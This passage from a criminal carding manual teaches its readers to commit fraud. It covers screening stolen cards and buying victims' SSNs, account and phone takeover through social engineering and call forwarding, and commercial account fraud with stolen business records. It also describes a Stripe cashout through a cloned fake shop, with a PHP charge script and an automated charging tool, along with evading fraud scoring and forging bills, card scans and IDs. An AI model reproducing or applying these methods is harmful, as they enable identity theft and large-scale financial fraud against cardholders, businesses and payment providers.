package, and disappear. You just got more free stuff using a credit card +that will eventually, maybe, get a chargeback, but you get the point. +For Intel, they ask for the 5 lines of text on the CPU itself, and a credit card for hold, so you need to +have the unit in your hands for it to work. +For ASUS, the serial number is enough, they require a credit card. + +For Dell, it's the easiest, no credit card needed, just order your free item on the phone without credit +card, you just need a name and an address. +Feel free to discover weaknesses in other companies' systems, this is a relatively new kind of fraud and +has not been patched. Many people use that to get free Xbox One from Microsoft. Most companies +require that this warranty claim is done over the phone but don't worry, it's simple, and most of them +don't seem to care about their job. I had 2 declines when carding Intel, the third one worked like a +charm, and they did not even get cocky about it. +You can keep one for yourself and sell the other one on eBay or Craigslist, it's easy money to make. +The point is that they have to try to screen fraud at the same time than offering a seamless experience +for legitimate customers. We just abuse the system. +Section 1.7 – Picking The Best Cards +If you don't have access to fulls, or you have a CCV autoshop and you want to get the best out of it, +there's a trick that can save you money, if you have a bit of time to invest. It works with any autoshop +as long as you can see the name and zip of the cardholder. +First, search by desired BIN. If you like ATOs and you want good cards, BINs 426684 and 438854 +work well, but that is up to you. If you can't search by BIN, just pick Credit Cards from any bank. Once +you are in the list, find cardholders corresponding to your gender, and for each one, do the same thing. +Search their name and zip on Backstab or SSNFinder to check if you can find them. Most of time time +(>50%), you will not, especially if the cardholder is under 45 years old. So just do the same for the next +result. When you have the SSN and DOB of the cardholder, before buying the card, do this thing to +double-check the info: +Go on peoplefinders.com and get their background report. Check if the DOBs match, and if the address +list matches too, to make sure you have their SSN and DOB 100% accurate. When you are sure, buy +the card, and buy SSN and DOB. You now have a fulls. You can go on archives.com or ancestry.org to +get their MMN. Here's how to search; +Card an account on any of those 2 sites (level 2 card is enough, it's very easy). Get the mother's name +on the background report, and search using her first and last name, and correct date of birth. Search for +“marriage” records, if you can't find any, search “birth” records. If you don't find anything, try +searching for the father's marriage records. Note that not every state / county has their records made +public, so it's possible that you won't find it at all; it's okay, just make one up when you ATO the card. +This way, you can scrub the autoshops and select only the cards where you can have full information. +This is my trick to get only good cards. Of course, the best option is to find a fulls vendor, but there are +not a lof of them, so escalate your cards the way you desire. +Make sure your cards are well organized. I have included a sample Excel file where you can see how +my cards are organized. All cards can be sorted by name, address, number, expiration, DOB, SSN, etc. +Look at the file for more information. Also, use line colors for different meanings. Example, white +rows mean that the card is mine, and still not used. Call the bank before adding the card to the list, +because you want to trash junk cards right away. Yellow means that the card is burnt, and blue means + +that the card is currently being striked, so I know what to focus on. Green means that I fucked up the +cardholder's credit history using his DOB and SSN. When you look for fulls, look at your Excel file, +and with the colors, you can find your card quickly. +Then, just check the balance, study the background report, and you are ready to hit big shops and get +stuff at your drop! +Section 1.8 – Commercial Fraud +Want another (and probably easier) to get items shipped to your drop and getting tired of carding +Newegg and TigerDirect? All right, I'll show you another method for that. This method works best for +Canada but is really good for USA too. +You can find any major provider that only sells to commercial customers. For computer parts, for +example, you can targer ASI, Synnex, and so on. The goal is to get the business registration certificate +of a business in the town you wish to have your drop. This certificate is usually public data and can be +found on the registration records depending which state or province you are in. Once you got the +business registration documents from a business that operates in the same field of activity you wish to +get items for, you are ready to hit the provider. +Apply for an account at one of those providers using that document, put all the business address info, +but put a drop address close to that place, and your burner phone number. Both providers (ASI and +Synnex) usually don't call, but just in case, better stay safe. It usually takes 24-48 hours to open an +account. “Your name” is the name of the real business owner. On the credit application, do not request +net terms, just write “no credit” and let them know you will pay before getting items shipped. +On the credit card authorization form, put the cardholder's (pizza) name, address, card number, +expiration date, CVC code. Let them know that this person is an “officer” at your business, such as a +remote sales representative. Once the application is approved, you are good to go and hit big amounts. +The reason is that they do not make verification when sending orders, as they almost never get +fraudulent orders. They assume that commercial customers are always going to be legit, but in fact, we +use someone else's business documents to trick them into thinking you are the business owner. +I was able to pull over $5,000 per order using that technique; the merchant is considered low-risk so +there are very few declines, and verifications are almost nonexistent. With computer parts, it's +extremely easy to do that, you can try other commercial providers. Now you are playing in the big +game, and the possibilities are endless. Make sure to never show your face at the drop once the card +burns, as they will really try to find what happened. +Section 1.9 – Newegg And TigerDirect +Always wanted to card those 2 big merchants to get electronics? I will tell you how. This is normal +difficulty if you know what you are doing and if you are good at social engineering. You need, at the +very least: +1) Cardholder's account ATO and billing phone number changed to your burner +2) Shipping address on file with the bank +3) Full background report on the cardholder +4) Story about why you ship to that address + +5) Local area of the cardholder: restaurants, shopping malls... +And remember, mail forwarding companies are blacklisted by those merchants. Don't try shipping to +MyUS, Bongo, and so on, as it will automatically cancel the order. Which American would use a US +card to ship to a forwarding company to get it out of the country? None. Have a normal drop address. +Number 5 might seem strange, but it's true. Some people, including myself, have been asked “can you +name a local restaurant near your house” to make sure you are the cardholder. So it's not a bad idea to +get familiar with the surroundings (major malls and restaurants) in case that happens. You'll thank +yourself later. +So, take your time to browse, look around, read descriptions, and appear like a legitimate shopper. +Once you did that a few days and the account is ready, send the order, and try not to go over $2,000. +The order will be placed on “hold” status, and you will have to talk to the verification department. I +will describe the procedure for TigerDirect, but Newegg is fairly similar. +TigerDirect's website will ask you for addresses, credit card information, then you will have to pass +VBV/MCSC. After that, they will ask you for your date of birth. Then, 3 verification questions will +pop. They are public record information about the cardholder and can be found in your background +report. Try to have so much information that you feel like the cardholder is your friend. Answer the 3 +questions and be quick. If you fail one, you will be asked an additional question. If you fail 2 or more, +forget your order. Once you send everything, your order will be “on hold” status. You need to call the +verification department. Conversation goes as follow, usually: +Rep: Thank you for calling TigerDirect verification department, can I have your order number? +You: 123456 +Rep: All right, what is your name? +You: James Layton +Rep: Thank you Mr. Latyon, let me verify the order for you. +(you will be on hold about 2 minutes) +Rep: Thank you for holding, is a tenant at the shipping address? +You: Yes (giving the wrong answer voids the order) +Rep: I could not locate that person in the system. So you will be offered 2 options. Either we ship to +your billing address, or you need to call your bank to add the shipping address as an alternate address +on file so we can ship there. +You: I already did. +Rep: Oh really? All right then, let me verify that for you. Please wait. +(you will be on hold while they call your bank, sometimes they can make a 3-way call) +Rep: All right, I see the shipping address is on file. Thank you, and is it okay if I call you on that phone +number, 123-456-7890? (whatever phone is the primary billing number) +You: Yes, sure. +Rep: Thank you, hold on. +(the phone will ring, pick the call, or the order will be void) +Rep: All right, we have successfully verified your identity Mr. Latyon. We will have the order shipped +out to you tonight. +See the pitfalls in the dialog above. You must assume that the shipping name is a tenant at the address. +For example, if the cardholder's name is James Latyon, you can ship to a Joseph Layton and assume it's +your son, but make sure that name is on the background report and you have their DOB. Sometimes + +they may ask for it if they get suspicious. +It is also a good practice to avoid Hotmail addresses; anyone can make a fake Hotmail under someone +else's name. You should use a custom e-mail with a custom domain. If you read the next part (section +1.10 – Stripe Cashout), you will see how to setup your own domain. Let's say your fake shop is +bestclothes.com, and your cardholder is named James Layton, you can create an e-mail +jlayton@bestclothes.com and it will look like a commercial e-mail address and will lower the red flags. +Trust me, it plays a lot when carding hard merchants. +Next, you must make sure you can pick the phone when they call the “billing” number. If you do all +that correctly, you are good to go and you will get your parts. They do not ask for scans of documents, +everything is done over the phone. +Section 1.10 – Stripe Cashout +If you're not really into carding physical products, then you might want to be interested in how to make +actual money with your cards. For this technique to work, you will require: +1) A bunch of level 2 cards (address is not required) +2) HTTrack program (can be downloaded for free) +3) Notepad++ program (can be downloaded for free) +4) Drop bank account +5) Dead full (name, address, DOB, SSN), referred to as “cardholder” +6) Basic computer skills +The first step is checking on stripe.com to see if your country is in the active list. If not, you might want +to get a bank drop in an active country, usually USA is the easiest. +The first step is creating a fake online e-shop. This is very easy, you can google, for example, “usa +clothes online”, and jump to page 12 of the results, to get smaller shops. Try to find a shop that has a +very simple design, about 100-200 items, avoid big ones. Take one that do not seem to use Javascript a +lot. You will maybe have to look 4 or 5 shops to find that one. +Then, open HTTrack, start a new project, and mirror that website. This will create a local copy of that +website on your computer. In the best case, try to stay under 800 – 900 MB. Once you have a local +copy of the shop, check if you are able to browse it, view items, etc. Of course, the whole shop won't +be functional, for example, you will not be able to register, that's normal. Try looking item descriptions, +browse categories, and look like a normal user. Once this is done, you now have a copy of that online +shop, already pre-made, and it took a few minutes (maybe hours) to mirror, but you don't have to stay +in front of your computer. +The next step is to open the contact page using Notepad++ and editing the contact information to a +custom name you decided to make, and the address / phone number to match the cardholder's address +and phone. If there's a Google Map, make sure you edit it too. This is where the basic computer skills +come in handy. If you have absolutely no idea how to edit HTML, I suggest you get an online course, +as this can be an invaluable skill. It's very easy to learn. +Look for some footers, privacy policies, and terms of use where the old name may appear, and edit it. +Use common ense here. You now have your custom clothes shop, that took less that 1 hour to make, +and you appear to have a legitimate business. Yay! + +Use Notepad++ to do a search & replace for the regular expression “” +(never include the quotes in any example) and replace it by nothing. This will remove all the “Mirorred +by HTTrack” comments in the source code, in case they look at it. +However, you might get a bunch of folders in your website directory. Let's say the mirroring is finished +and you have a www.fakeshop.com and a img.fakeshop.com folder. You want to move the +img.fakeshop.com folder and put it inside the www.fakeshop.com folder. Then do a search & replace +for “.../img.fakeshop.com” and replace it by “img.fakeshop.com” in all *.html files, and everything will +be good. Repeat for each concurrent folder you have. Make sure you can open the index.html page in +your www.fakeshop.com folder and everything shows up correctly. +Do a search & replace for the phone number of the shop and replace it by a random toll-free number +(they will never call). Do the same for addresses. For phone, make sure you include all formats like +123-345-6789 and 123.233.2133, and so on. Double-check everything. Then, get rid of the e-mail +addresses. Do a search & replace for “@realshop.com” and replace it by “@fakeshop.com”. +Ultimately, get rid of all occurences. Rename the folders that include “realshop” and replace it by +“fakeshop”, and to a final search & replace in all the files for “realshop” and replace by “fakeshop”. +This way, there should be no way to recognize that the shop is fake. You can change the logo at the top +of the page, or if you are lazy, rename the logo file to another name and the browser will just put an +“image not found”, it's not a big deal. +We are done with creating the shop. It might seem a lot of steps, but doing all that search & replace and +preparation should take less than 5 minutes when you are used to it. +The next step is hosting your website. It is important that you use an anonymous host, so for this +example, we will use Arvixe. I used to have this one a lot with my fraud sites. Use a made-up Hotmail +address that corresponds to your cardholder, open an account on your hosting company, and host your +files on it. Almost all hosts will allow you to register a domain. They might ask for address info, so just +give them your cardholder's address info. So setup the account, register the domain, and host your files +for the fake shop. Just upload them via FTP (if you don't know how to do that, get basic lessons). Make +sure your shop is online and works, for example, let's assume your shop is myfraudsite.com. Make sure +that myfraudsite.com displays your shop and that you can browse. +It is also important that you change the WHOIS information to match the name you will be using on +your Stripe account. Your web host will allow you to do that for free. Anyone can look it up on +whois.net as this is public records. If the bank accout, shop and WHOIS are under different names, +flags will be raised. Assign all 4 contact types to match the victim's information. It can be changed later +and many times anyway. +Then create an e-mail address related to this host, usually with the prefix “admin”. In this example, we +will create “admin@myfraudsite.com”. This makes you look legitimate. At this point, you should have +your online “shop” working, and an e-mail address associated with it. Everything should be hosted on +an anonymous host. They usually charge $10 per month in bitcoins. We are now ready to start making +money with our fraud site. +Before you open the account on Stripe, you should make sure you completely spoofed your VM. Also +disable Flash plugin. Stripe has a very clever way of identifying you, which means they can identify + +you even if you change IP and change browser. Better use precautions and see section 2.6 to completely +appear as someone else. +Open an account on stripe.com using this e-mail address and keep the account in “test” mode. Create a +page named “charge.php” and upload it to your web shop. This will be the file you use when you send +a charge. Here is the code you should put in the page. Note that you can adapt the code as you wish, but +that's my personal example: + $_GET["amount"], +"currency" => "usd", +"card" => array( +"number" => $_GET["number"], +"exp_month" => $_GET["month"], +"exp_year" => $_GET["year"], +"cvc" => $_GET["code"] +), +"description" => "This will appear on the card statement" +)); +echo "Charge OK"; //Success! +} +catch (Exception $e){ +$error = $e->getMessage(); +echo "Error: ".$error; //Failure. +} +?> +For your convenience, I have included this file in the package, as well as the Stripe library package. +They are hard to find on their site and I am doing you a favor by including them. +Take time to understand what this code does. You will call this page using this query: +http://myfraudsite.com/charge.php? +number=4266841200000000&month=2&year=2016&code=333&amount=6800 +This will charge an amount of $68.00 to the card 4266 8412 0000 0000 expiring February 2016 with +CVV code 333. It's simple like that. Change the parameters to plug whatever cards you have, and try to +vary the charge amount too. +Make many variations using the test key to appear like you really made some testing. Make charges +and see the result, and get familiar with this code snippet. +When you have a working example, switch your Stripe account to Live mode. You will be asked to +provide the name, address, DOB and last 4 of SSN of your cardholder, so just proceed. Ignore the tax +number part, put the website address, put a small description of your choice, and put the account in live +mode. + +Now you will be asked for your bank information. This is where you will provide the routing number +and account number of the bank drop where you want to receive the money. All information is filled +and you are ready to make money! +You can use any autoshop to get a lot of cards. You only need the card number, expiration date, and +CVV code to proceed. Get cheap cards, this is the easiest transactions you will have to do. You can try +Vault Market, which provides $4 USA cards at the time of writing. Beware though, you have +precautions to take to avoid getting your operation shutdown, so read the next part before you go crazy +with the cards. +First, you must keep an approval rate over 50% on all your transactions. This means that over half of +your transactions must be approved. So you should have a good card source. If the decline rate is too +high, they will refund all payments to the cards and close your account. +Second, you must use cards from the same country your fake shop is supposedly based in. If you have a +UK shop, use UK cards, even if they are more expensive. Not 100% of your cards must follow this +rule, but try to keep it over 90% to avoid suspicion. +Third, vary the amount of the charges you make. Vary a lot, for example, between $50 and $300 per +transaction. Do not go over $300 as you might get declines that count in your 50% approval quota. You +don't want to get shut down. Also, try to wait a bit between transactions, even if you love money. We all +love money but keep it looking real. +The rest should be common sense. The money gets deposited after 7 days for the first transaction, and 2 +days for subsequent transactions. There is another approach which has been tested once and proved to +be successful: the anon card. We can be afraid of chargebacks (I'll talk about them later) coming in +before 7 days, so here's how we can bypass it. When your account is in live mode and running, use an +anon card to make a transaction of around $100 (you get the money back in your bank drop anyway), +and 3 days later, use another card to make a transaction of $50. The money will obviously not get +charged back and will be deposited in 7 days. When this is done, start hitting with real pizzas. This +way, you get rid of the 7-day barrier that might get you closed. +Now, what about chargebacks? If a customer disputes a charge, mostly with “Fraudulent” code, you +will get an e-mail saying that the charge has been disputed, a $15 chargeback fee to pay, and the +amount will be deducted from your next transfer. This is up to you if you feel that the number of +chargebacks is acceptable against the number of cards you can process. Make your calculations, and +when too many chargeabacks start kicking in, time to trash it. +By experience, chargebacks take forever to arrive, and less than 25% of your transactions will end up in +a chargeback. You shouldn't see a chargeback before at least 10 days, and probably more. I kept one of +my old account, and after 2 months of inactivity, 38% of transactions had received a chargeback, so this +is not something you should worry about. +To trash an account, just close your drop bank account, or charge your account info in Stripe to another +random account (same routing number). Delete all files from your hosting, put the files of a new fake +shop, register a new domain, open a new Stripe account, and start over. +Repeat until your wallet is full. Always use VPN when accessing your website or Stripe, you don't want +to leave your real IP for LE to get back to you and knock on your door! + +A word of advice though, I do not recommend using Ally or Netbank, as they often flag transfers +coming from Stripe and lock the accounts. You should head to Evo and get a real bank drop, it might +cost you a bit of money but it's worth the investment for sure. +By experience, Stripe looks at the domain age for your domain. You should wait a bit before you setup +your Stripe account, or buy a cheap site on Flippa just to snag the domain name. This is not extremely +important but can lower the flags even more. +Another way to get around fingerprinting and look more like new is to use a RDP. You can purchase +some on the marketplace and they work pretty well for setting up Stripe account. Only login from that +RDP and if the RDP dies, just don't log in Stripe dashboard anymore. You will still get the deposits +anyway. +If the account gets closed, they often tell that they will refund charges to cardholders. If this happens, +be quicker than them, and refund all the charges yourself. Refund everything you can. This way, you +will be able to re-use those cards for another shop and you will save a lot of money. The cards will +most probably not get burnt for fraud, because the charge was refunded. When you do that, however, +wait at least 5 days before re-using them. This will lower the fraud score. +For UK carders, Stripe may ask for a scan of a government-issued photo ID at some point. It is a wise +idea to make one when you start making some money with Stripe, so you can provide it when you get +asked for it. It's not hard to make using Photoshop. +I made several thousands of dollars using this method and it cannot really burn. Up to you to discover +what works best for you! +Section 1.11 – Beyond the ATO – The PTO +When you commit Account Take-Over fraud, also known as ATO, you take “ownership” of the victim's +account. Even if you change the phone number on file, they still keep record of the previous phone +number. This is where this section will prove useful. I will give you the transcript of a failed ATO I had +2 months ago, and you will understand. +(pass verification questions) +Me: I am calling because I tried to place an order online, but it got declined. The charge is $1500 and +the merchant is Newegg. +Agent: No problem Mr. Johnson, let me see what I can do for you, can you please hold? +(by experience, if they put you on hold, hang up, it's most likely burnt, here it took 5 minutes) +Agent: Hello? +Me: Yes madam, I'm still holding. +Agent: Unfortunately I will not be able to let the charge go though, and I can no longer provide service +on this account. +Me: How about my card? What should I do? +Agent: You can destroy the card, as you are not the real Robert Johnson. +This is a situation that sucks, and there's a way to avoid that. It has to be done before calling the bank. +What happened here is that the agent called the previous number, even if I changed it a few days ago. +The real cardholder got the call, and you can imagine the rest. + +First of all, take the real phone number of the cardholder, and use WhitePages to find who is the phone +provider. If you cannot find it, then you might want to use Spooftel and call the various providers +(AT&T, Verizon, Sprint, etc.) and use their automated system to try to find out if the number is +registered with them. You can use phonevalidator.com to see if the phone is a cellphone or a landline. +When you have the background report of the victim, you can see that they often have many phone +numbers. Use the service to find which one is landline and which one is cellphone. For cellphones, it's +very easy to find the provider, as most of them allow you to call the phone and press * (star) to go in +the voicemail settings, so you recognize the greeting. Use your logic, and write the phone numbers, +probably like that: +Phone 1, landline, 555-123-4567, Verizon +Phone 2, cellphone, 666-234-5678, AT&T +Now, remember, you have the full address, DOB, SSN, and more information on the cardholder, and +you know what is his phone company. What are we gonna do? That's right, Call Forwarding! +Call up the phone company using the opposite phone (if billing number is the landline, call with the +cellphone, and vice versa), spoof the number. When you talk with the customer service department, it +might go as follow. Don't forget that it's less secure than banks, as it's not about finances. But it can +have worse consequences. +Agent: Thank you for calling Verizon, my name is Mohammed, how can I help you? +Me: Hi! I will be away from my house in the next days but I'm waiting for an important call on my +landline. Since I cannot reach the other party, I would like to set call forwarding so I will receive the +call on my cellphone. +Agent: No problem, can I have your name? +Me: Barack Obama. +Agent: Thank you Mr. Obama, what is your full address? +Me: 123 fake Street, Washington DC, 12345. +Agent: Thank you, and may I have your date of birth? +Me: October 1st, 1845. +Agent: Thank you. Did you know that you can press *72 on your phone to activate call forwarding? +This is an easy way to do it without calling customer service. +Me: Thanks for the tip, however I'm not home at the moment, so I am unable to do that. +Agent: Okay no problem, I will activate it for you. What is the phone number you would like the calls +forwarded to? +Me: That's my cellphone, 456-123-3245. (your burner phone) +Agent: All right, and you want it to start now? +Me: Yes, please. +Agent: No problem, I activated it for you. When you will be home, you can use *72 again to deactivate +the forwarding. +Me: Thanks. +Agent: Is there anything else I can help you with? +Me: Nope, thanks. +Some phone companies, AT&T by experience, ask for a 4-digit PIN, but it can be easily bypassed using +DOB and last 4 of SSN. The good point is that, if you are extremely unlucky and fail (which should not +happen because it's easier than banks), the card will not burn. This is the PTO, Phone Take-Over fraud. + +This word was invented by me. +Now you are ready to call the bank to ATO. If they decide to call the billing number (happens very +rarely), you will answer the phone, and it will destroy all suspicions they have. The cardholder will +probably be locked out of his account, but that's not your problem. The first dialog (failed ATO) can be +avoided if you do that before. +When your business is finished, do not forget to call Verizon (or his company) to deactivate call +forwarding. The goal is to get free stuff, not make the cardholder lose friends because they can't reach +him, use a bit of compassion. If you think you will need his phone line for a few days, you can use +RingCentral phone system and decide which numbers you want to take the calls from, and which ones +you just want blindly transferred to the cardholder. He will probably never notice that someone fucked +with his phone line, but will notice the charged on his card! +Some websites do not require the shipping address to be on file with the company; in those cases, you +can do a PTO without doing an ATO, and put the correct billing number on the website. Take the call +from them and confirm the order, and restore his phone line. Use your imagination for the rest. +Section 1.12 – Maxmind Fraud Prevention Algorithm +The most popular software used by merchants for fraud prevention is the Minfraud software, designed +by Maxmind. It is used to keep fraudsters as bay, but their formula is not so secret. I will give you the +formula, and explain the variables. There is a way to keep this score low. +Many stores have their own preset limits, which are not made public because each store is different. +For example, a store can say that over 7 they send the order to manual review, and over 9 they cancel it. +The definition of the variables goes as follow: +1. IsFreeEmail Is the e-mail address from a free provider like Hotmail or Yahoo? +2. CountryDoesntMatch Are the shipping and billing countries different? +3. IsAnonymousProxy Is the user using an anonymous proxy like a VPN or blacklisted Socks? +4. HighRiskCountry Is the order involving Ghana, Nigeria, or Vietnam? List updated often. +5. BsDistance Distance between billing and shipping addresses, in kilometers. +6. MaxEarthArc The half-circumference of Earth, currently set at 20,037 kilometers. +7. BinDoesntMatch Is the BIN from a different country than the IP address used to order? +8. BinNameDoesntMatch If user is asked for bank name, did he answer correctly? +9. CarderEmail Was the e-mail used for fraud on other sites using Maxmind? +10. HighRiskUsername Was the username used for fraud on other sites using Maxmind? +11. HighRiskPassword Is the password the same than the ones used for fraudulent orders? +12. ShipForward Is the shipping address a mail forwarding company? +13. ProxyScore Is the IP address a proxy or socks? +The algorithm used for fraud score calculation goes as follow: +2.5 * IsFreeEmail ++ 2.5 * CountryDoesntMatch ++ 5.0 * IsAnonymousProxy ++ 5.0 * HighRiskCountry ++ 10.0 * min(BsDistance, 5000) / MaxEarthArc + ++ 2.0 * BinDoesntMatch ++ 1.0 * BinNameDoesntMatch ++ 5.0 * CarderEmail ++ 5.0 * HighRiskUsername ++ 5.0 * HighRiskPassword ++ 5.0 * ShipForward ++ 2.5 * ProxyScore += Maxmind score for this order +Now that you have this formula, let's see how we can reduce the score to almost 0. Although many +stores use proprietary software, this one is widely used and is the most popular. Since there is no way +of knowing which software the shop uses, just pay attention to all the variables and try to look legit. +Here is a more in-depth explanation of each variable and how to pay attention to it. +1. IsFreeEmail +This variable is set to 1 if you use a free e-mail like Hotmail and Yahoo, so don't use it. I'll give you a +trick. Remember the Stripe cashout part? Create an e-mail address from the same domain, like +shopper.name@myfakeshop.com and use it. Since it's a paid e-mail, this flag will not be raised. I +always did that for my orders. +2. CountryDoesntMatch +This variable is set to 1 if you ship to a different country than the billing address. This can be solved by +using a card from the same country than the shipping address. This is easier if you ship to USA. Note +that this is not a big deal since you can make an excuse, but let's not raise flags for nothing. +3. IsAnonymousProxy +This variable is set to 1 if you use a VPN or public anonymous proxy. This is also true for blacklisted +socks. You can use a RDP instead, or if you can't get one, try to find a clean socks, but it's mostly trial +and error. +4. HighRiskCountry +This variable is set to 1 if you have either the billing or shipping address in a country that is considered +high risk. Since this list is always updated, I can't provide the list, but no western country is in that list, +so if you are in UK or in USA, no danger. +5. BsDistance and 6. MaxEarthArc +This is the distance, in kilometers, between the billing and shipping addresses, up to a maximum of +score 10. You can solve this problem by getting cards in the same state than you are shipping to. Using +a California card to ship to New Hampshire will raise this score. +7. BinDoesntMatch +This variable is set to 1 if the BIN is from a different country than the billing address. This is the +problem with non-AVS cards, and why I don't recommend them. Stick to AVS, and get a BIN from the + +same country. Use common sense. +8. BinNameDoesntMatch +This variable is set to 1 if the user answers the question “issuing bank name” incorrectly. So for this +one, do a BIN check, and write the correct name, exactly as it appears in your BIN info, and you will +be fine. +9. CarderEmail +This variable is set to 1 if the e-mail address was previously used for carding. All websites send regular +usage data to Maxmind and they have a list of the carder e-mail addresses. One mistake carders make is +reusing e-mail addresses, thinking that shops don't know that the previous shop was carded. Maxmind +holds a list of carder e-mail addresses submitted by shops. Use each e-mail address only once, and use +a different e-mail next time you card. +10. HighRiskUsername +This variable is set to 1 if the username was previously used for carding. Read the above statement and +do the same thing than e-mail addresses. +11. HighRiskPassword +This variable is set to 1 if the password was previously used for carding. Pay attention to not re-use +passwords across sites. +12. ShipForward +This variable is set to 1 if the shipping address is a mail forwarding company. They include MyUS, +Bongo, and many others. Some sites will outright ban those addresses and cancel every order made to +them. Avoid shipping there, there are many other options to get drops. +13. ProxyScore +This variable is set to 1 if the originating IP addresses is a proxy, or a socks. If the proxy's goal is to be +anonymous, then the variable IsAnonymousProxy will be set to 1 also. +Having all this information in hand will allows you to nuke fraud prevention systems and get your stuff +even more easily. The high-risk country list is always updated but you can always google for it if you +want to have an up-to-date list. +Always use a VPN with your socks proxy. The TrueIP technology used by many fraud prevention +software can sometimes bypass your proxy and get your real IP, so pay attention. +Section 1.13 – Order Verification Procedures +The decision to accept or reject an order is based on many verification procedures that shops do, so I +will make an entire section on that part so you can avoid cancelations. It's frustrating when you have a +platinum card and you burn it. So read on. + +Utility bill +Some shops will ask you to e-mail them a copy (front back) of a recent utility bill. Most of the time, +they require the bill to be no older than 3 months. To deal with that, I have included a PSD file of an +electricity bill, and the text of the name and address is editable so you can edit it at will without too +many Photoshop skills. Make a bill with that PSD and send it along with the back image of the bill +(JPG format). No need to make anything more complicated. +Scan of credit card +They can ask you to send a scan of the credit card used for the purchase. I have included the PSD of a +credit card, with the same exact font used for real cards. Edit it at will, change the logo, and export to +JPG. It is a wise idea to google for an image of your BIN (example, “platinum chase visa”) so see what +it's supposed to look like. With the included PSD, this should be a piece of cake too. +Photo ID +It's difficult to provide scans because every state and every country is different. In that case you should +just google for your requested ID, for example “michigan driver license” and edit it with Photoshop. +The driver's license number can be made-up, because they can't verify that. Just concentrate on making +the issuing and expiration dates logical, change the picture on the license, and put your name and +address and it should be fine. +Phone verification – easy +They can call you for a verification call and just ask if the order is legit, and sometimes ask to confirm +both addresses. This is fairly easy, and the order will go through. +Phone verification – hard +They can be more pissy and ask you verification questions. Those questions are all from public records +and are included in your background report. If you did your homework and studied your background +report, you will be able to answer them. They have multiple choices (4 choices), and most of the time, +1 question has “none of the above” as the correct answer. By memory, B&H Photo does this type of +verification.This used to be a place where I like to shop, but since they increased their security, +Geoffrey (the verification agent) is a bit more hard to convince. +Having shipping address on file with the bank +They can ask you to call your bank and make sure the shipping address is on file with them. Read the +section about ATO and you will learn how to do that, it's not that hard, but you will need a fulls in order +to achieve that. +This completed the list of verfication procedures used by online shops. Learn from this section, study +it, and get ready for anything. +It your last order was easy, it doesn't mean that your next one will be easy. Some sites increase they +security procedures for any reason and decide to be pissy. + +You must usually respond within 24 hours to avoid order cancelations. Be quick. If you plan on doing a +big heist, you might want to have the scans ready before you place the actual order. +Section 1.14 – Stripe Automated Cashout +In the new version of this guide, I have included a small piece of software made by myself: the Stripe +cashout script. It allows you to send automated queries to your server. I will tell you how to use this +little piece of engineering. +First of all, make sure your Stripe server is all set (see section 1.10 for that) and that you can make live +charges. Make sure charge.php is uploaded and everything works. Good? Now let's make automated +charges. +Open the cards.txt file and put your credit card numbers, dates, and security codes. If your credit card +number is 4123 4567 8901 2345, expiration 04/2034 and code 343, the lines should be as follow: +4123456789012345|04|2034|343 +4444444444444444|02|2019|123 +One card per line. No extra characters, no spaces, nothing. Just card information in the cards.txt file. +You can put as many as you want. +When you open launch.bat, you will be asked for 5 questions before the script starts to run. Here are +those questions and how to answer them. +Q1: Charge.php URL +This is the full URL of charge.php on your server, without any extra parameters. Make sure the file is +uploaded and that you can access it with your browser. +Example: http://www.myfakeshop.com/charge.php +Q2: Minimum delay between charges +Since charge times are randomized to avoid making an obvious pattern, this parameter is the minimum +number of seconds to wait between charges. We recommend a minimum of 3600 seconds (1 hour) to +avoid raising suspicion flags by Stripe. This parameter has to be an integer without any extra +characters. +Example: 4400 +Q3: Maximum delay between charges +Following Q2, this is the maximum number of seconds to wait between charges, and this number is +inclusive. Again, no extra characters or spaces. +Example: 8200 +Q4: Minimum charge amount +Charges are also randomized, so you need to supply the minimum and maximum amount of the +charges. I recommend staying under $200 to avoid suspicion. This is an integer, is only the integer part, +and must not have decimals. For example, 54 means a charge of $54.00 (or any other currency you +might have put in your charge.php file) and this number is inclusive. +Example: 50 + +Q5: Maximum charge amount +Following Q4, this is the maximum amount (inclusive) of the charges. Again, try to stay under $200, +and you should be fine. +Example: 140 +The script will run for as long as your cards.txt file is not exhausted. Note that all cards are loaded at +execution time, so if you add cards to your cards.txt file, they will not be taken care of before you +restart the program. The log.txt file will contain all processed cards and the returned result (OK, +declined, invalid, etc.) so you can exchange the dead ones. +There is no limit on the number of cards you can cashout, and if you use this piece of software in an +intelligent way, you will avoid account suspension. +If you are familiar with command line, you can also launch it using command line: +java -classpath . app.Main Q1 Q2 Q3 Q4 Q5 +This last method (command line) is useful when you have many servers to probe at the same time, for +maximum profit. If you want to stay simple, just open launch.bat and supply the parameters. +No need to pay thousands of dollars for cashout software when you can just use this small script to do +the job for you! +Section 1.15 – CC to BTC +Many people are also looking for CC → BTC methods. I will explain a few ones here, but be aware +that some methods might not work anymore, or new ones be available. I try to keep it as much up to +date as possible. +Method 1: Virwox +This is one of the most popular methods. Virwox is hard to card, but there are ways to do it. First of all, +almost all Socks are blacklisted; you will need to use a RDP close to the cardholder's location. Create +an account using an e-mail address that's not free, such as your Stripe fake shop e-mail address. Once +the account is created, you should wait at least 72 hours before doing anything. +During that 72 hours, you will need to ATO the credit card account and change the billing number (you +can still use that card for purchases after, so don't worry) as there is a very strong probability that the +bank will make a verification call. Skrill is a high-risk merchant and, even for my legit account, I get +calls from my bank when I use Virwox. +Then use the Skrill method to make a payment to charge this account, and stay under $100 for the first +time. At this point, 3 things can happen. +#1: The transaction goes through and the account is funded. That's what we hope. +#2: Skrill asks for a SMS verification. You cannot use public SMS numbers, RingCentral numbers, or +Google Voice. You need a real cellphone for that, and Skrill is very selective on numbers that they +accept. You will need a physical burner cellphone to accept that SMS. When you do it, the transaction +will go through and the account will be funded. +#3: The transaction is denied, at this point you will be happy to have an ATO'd account as you can call + +the bank and authorize it, then retry. +Now that the account is funded, convert USD to SLL, then SLL to BTC, and make a withdraw to a +bitcoin address you never used before. If a fraud is reported, that BTC wallet address will get +blacklisted. You will then get a message that asks you to wait 48 hours before the withdrawal goes +through. Actually, it takes in average 30 hours for the transfer to be complete. +You can now enjoy your fresh bitcoins! +Method 2: Coin.mx and Coinmama +You will need a fake ID, utility bill, and scan of the credit card to card those sites. Make sure you are +good with Photoshop and that you can make them. You will need to ATO the accounts and be prepared +to receive a confirmation call. +Since the policies of those sites always change, I will not go in the details of what they ask, but use +your Photoshop skills and make some bitcoins using your cards. +Method 3: Carding things and selling them +This is the method most people recommend. Use virtual carding to card items such as electronics and +sell them. Use the money from the sales to buy bitcoins. +Using eBay to sell carded electronics is safe. You do not need to provide the serial number of those +items, so just sell them as if they are legit. Craigslist is also safe.There are many ways to get rid of +those items, so just use your imagination. +Section 1.16 – Squareup Cashout 